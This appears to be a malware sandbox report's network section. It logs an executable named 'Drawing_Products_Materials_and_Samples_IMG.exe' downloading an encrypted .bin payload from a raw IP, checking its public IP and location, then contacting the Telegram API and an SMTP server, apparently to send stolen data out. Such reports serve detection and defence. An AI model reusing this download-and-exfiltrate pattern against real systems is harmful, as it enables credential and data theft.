                                                                                    Sep 24, 2024 16:31:07.968678951 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968734980 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968785048 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968785048 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968791008 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968846083 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968900919 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968959093 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969013929 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969016075 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969017029 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969069958 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969116926 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969131947 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969132900 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969347000 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969347000 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:10.146998882 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.306575060 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.307049036 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.307245016 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.466943026 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.468969107 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.515968084 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.579926968 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.780144930 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.828763008 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:11.605926991 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.605969906 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.606194973 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.644723892 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.644737959 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.883245945 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.883503914 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.889650106 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.889688969 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.890120983 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.937504053 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:12.575345993 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:12.616238117 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.031892061 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.032385111 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.032543898 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.037396908 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.139579058 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:13.340534925 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.510498047 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.511519909 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.511639118 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.511903048 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.511993885 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.512046099 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.562087059 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:13.739794016 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.741363049 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.741409063 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.013746023 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.014264107 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.014532089 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.014837980 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.071763992 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:14.231560946 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.240473986 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.241241932 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241298914 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.241499901 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241736889 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241769075 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.296331882 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:14.473143101 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.474553108 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.474626064 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.742523909 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.742953062 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.743170977 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.743439913 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.834005117 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:15.034512043 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.010607958 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.011887074 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.011995077 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.012162924 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.013062954 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.013127089 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.061568022 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.237958908 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.239386082 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.239418030 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515086889 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515248060 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515438080 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.515857935 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.587178946 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.747169971 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.747762918 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.748270035 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748385906 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.748622894 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748776913 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748848915 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.795757055 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.985651970 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.987250090 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.987318039 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.255599022 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.256242037 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.256467104 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.256705046 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.341846943 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:17.542385101 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.550138950 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.550945044 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551103115 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.551299095 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551455975 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551527977 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.592467070 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:17.782279015 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.783651114 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.783683062 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.066019058 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.066606998 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.066839933 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:18.067153931 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:18.159825087 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:18.319644928 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.897870064 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.898660898 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:18.898767948 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.898957014 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:18.899194002 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:18.899260044 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:18.951543093 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:19.136204004 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.137581110 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.137649059 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.413599014 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.414063931 CEST44349817172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.414251089 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.414530993 CEST49817443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.500041008 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:19.659840107 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.663778067 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.664392948 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.664500952 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.664716959 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.664912939 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.664979935 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.717044115 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:19.895929098 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:19.897413969 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:19.897492886 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.165623903 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.166109085 CEST44349818172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.166301966 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.166641951 CEST49818443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.252079010 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:20.421629906 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.422353983 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.422461033 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.422725916 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.422945976 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.423019886 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.466845036 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:20.655172110 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.656514883 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.656563044 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.928092957 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.928590059 CEST44349819172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:20.928791046 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:20.929085016 CEST49819443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:21.330056906 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.330106020 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.330293894 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.330775023 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.330801964 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.738128901 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.738432884 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.739700079 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.739734888 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.740410089 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.741681099 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:21.784310102 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:22.092041016 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:22.092351913 CEST44349820149.154.167.220192.168.11.30
                                                                                    Sep 24, 2024 16:31:22.092484951 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:22.097729921 CEST49820443192.168.11.30149.154.167.220
                                                                                    Sep 24, 2024 16:31:28.798343897 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:28.984611034 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:28.984899044 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:29.174940109 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.175318956 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:29.382694006 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.631243944 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.631299019 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.631337881 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.631556034 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:29.631556034 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:29.821105003 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.821167946 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:29.821820021 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.009371042 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.009804010 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.009875059 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.010029078 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.011358023 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.197695017 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.245892048 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.305736065 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.493798018 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.493823051 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.493840933 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.494152069 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.497924089 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.686398029 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:30.686938047 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:30.918864965 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.073409081 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.074676037 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.260665894 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.260848999 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.261221886 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.447521925 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.447815895 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.633882999 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.672224998 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.672293901 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.672341108 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.672341108 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.672389030 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:31:31.858192921 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:31.858211040 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:33.428711891 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:31:33.479542017 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:32:25.421382904 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:32:25.421699047 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:32:57.180671930 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:32:57.289247990 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:32:57.289392948 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:33:00.429436922 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:33:00.589900970 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:33:08.693116903 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:33:08.879651070 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:33:08.879833937 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:33:08.879847050 CEST58749821185.230.214.164192.168.11.30
                                                                                    Sep 24, 2024 16:33:08.880017042 CEST49821587192.168.11.30185.230.214.164
                                                                                    Sep 24, 2024 16:33:08.880305052 CEST49821587192.168.11.30185.230.214.164

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Sep 24, 2024 16:31:09.990879059 CEST6152053192.168.11.301.1.1.1
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST53615201.1.1.1192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.469243050 CEST5089153192.168.11.301.1.1.1
                                                                                    Sep 24, 2024 16:31:11.605166912 CEST53508911.1.1.1192.168.11.30
                                                                                    Sep 24, 2024 16:31:21.219433069 CEST4921453192.168.11.301.1.1.1
                                                                                    Sep 24, 2024 16:31:21.329202890 CEST53492141.1.1.1192.168.11.30
                                                                                    Sep 24, 2024 16:31:28.686060905 CEST5471053192.168.11.301.1.1.1
                                                                                    Sep 24, 2024 16:31:28.797579050 CEST53547101.1.1.1192.168.11.30

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Sep 24, 2024 16:31:09.990879059 CEST192.168.11.301.1.1.10xd8b7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:11.469243050 CEST192.168.11.301.1.1.10xad35Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:21.219433069 CEST192.168.11.301.1.1.10xcf0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:28.686060905 CEST192.168.11.301.1.1.10x43cbStandard query (0)smtp.zoho.euA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:10.102323055 CEST1.1.1.1192.168.11.300xd8b7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:11.605166912 CEST1.1.1.1192.168.11.300xad35No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:11.605166912 CEST1.1.1.1192.168.11.300xad35No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:21.329202890 CEST1.1.1.1192.168.11.300xcf0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                    Sep 24, 2024 16:31:28.797579050 CEST1.1.1.1192.168.11.300x43cbNo error (0)smtp.zoho.eu185.230.214.164A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • 64.188.18.75
                                                                                    • checkip.dyndns.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.304980964.188.18.75803392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 24, 2024 16:31:07.313019991 CEST189OUTGET /ReySnONaTTPqhXrIqUlWWanbq212.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: 64.188.18.75
                                                                                    Cache-Control: no-cache
                                                                                    Sep 24, 2024 16:31:07.421670914 CEST1289INHTTP/1.1 200 OK
                                                                                    Content-Type: application/octet-stream
                                                                                    Last-Modified: Mon, 23 Sep 2024 23:30:37 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    ETag: "3441279810edb1:0"
                                                                                    Server: Microsoft-IIS/8.5
                                                                                    Date: Tue, 24 Sep 2024 14:31:07 GMT
                                                                                    Content-Length: 208448
                                                                                    Data Raw: 43 1e 41 aa dc 43 cb 85 9d 69 94 59 d1 8f 4a c0 27 28 8b bc 81 27 a3 a9 47 55 43 1f 91 a7 13 20 fa 04 93 31 0e cf 9a 0d 33 a9 1f 00 d7 b2 5e 49 81 63 bc 67 15 6a 27 8d 7d 65 b9 d6 6f 5d 48 aa 35 b5 0b ca f9 c6 2b 64 49 df e3 4a c1 61 af 68 fe 85 be 8c 2d 16 0c 2e 52 bc 30 60 f3 50 fb e6 1a 5c e3 94 dd ba b4 79 1b 46 81 10 02 98 20 69 b7 05 e1 ca a9 69 ef 62 60 b7 1e 7c e8 8a 3d cc 61 5f 01 23 45 a3 6e bd 6d 9a ab 8e 69 43 a5 05 27 7b 5e 2e b2 2a 53 95 96 2b f1 7e 8d 97 6a 17 c6 57 ef 9d d7 fd 2c 83 18 b2 a7 99 16 44 b4 dd 96 8e 38 cf 8e 8a ba 0f 3e b9 6c cb ca 06 1e 5e 62 50 6f 18 b1 48 8e 75 72 63 07 66 4a 55 a7 0d 8e 55 05 16 79 bf e0 1d d5 33 51 67 9f bf af 34 fb 25 c4 17 c7 2b c8 52 19 c3 9b 97 dc 77 e0 dc 4b 02 ef 3f fc fb 4d cc 58 d2 5c b0 c2 01 be ea 4d 3e f8 0d 51 14 97 65 8e dd fe f4 c5 48 a0 a9 6f 5b 5f e2 3e 8f a4 d4 80 51 5b c2 2a fc 11 82 aa 87 d3 b9 57 d3 1c 5c ea 5c 95 06 e9 13 2a a8 58 62 7b ee 8c f5 d9 6f b6 6a 0b 69 3f 24 13 79 ab ca 2e e7 5f ba 8e 5a b6 b6 5e d3 4b 0a 93 2a 3c 4f [TRUNCATED]
